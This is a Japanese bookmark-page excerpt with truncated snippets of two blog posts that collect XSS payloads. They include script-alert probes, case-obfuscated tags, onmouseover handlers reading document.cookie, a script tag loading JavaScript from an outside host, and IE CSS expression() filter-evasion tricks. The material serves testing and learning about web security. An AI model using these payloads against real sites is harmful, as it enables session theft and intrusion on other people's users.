XSSパターン
XSSパターン(暫定版) XSSのパターンを幾つか集めてみました。出典は下の方にあります。 1.'';!--"<XSS>=&{()}``\" テスト文字列。まずはこの文字列を突っ込む。 2.<script>alert(1);</script> 単純なパターン 3."><script>alert(1);</script> 単純なパターン2 4.<script src=http://nootropic.me/xss.js></script> ダブルクォートやシングルクォートが使えない際 5.<ScrIpt>alert(1);</SCript> 単純にscriptタグが禁止されている際に使用出来る。他のタグでも使うことが出来る。 6.<a onmouseover="alert(document.cookie)">XSS</a> aタグを使用したXSS。 7.<a onmouseover=aler
XSSの攻撃手法いろいろ - うなの日記
html5securityのサイトに、XSSの各種攻撃手法がまとめられているのを発見せり!ということで、個人的に「お!」と思った攻撃をサンプルつきでご紹介します。 1. CSS Expression IE7以前には「CSS Expressions」という拡張機能があり、CSS内でJavaScriptを実行できたりします。 <div style="color:expression(alert('XSS'));">a</div> 確認 @IT -[柔軟すぎる]IEのCSS解釈で起こるXSS で詳しく解説されていますが、CSSの解釈が柔軟なことともあいまって自前で無害化するのはなかなか困難。以下のようなコードでもスクリプトが実行されてしまいます。 <div style="color:expr/* コメントの挿入 */ession(alert('XSS'));">a</div> 確認 <div s
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
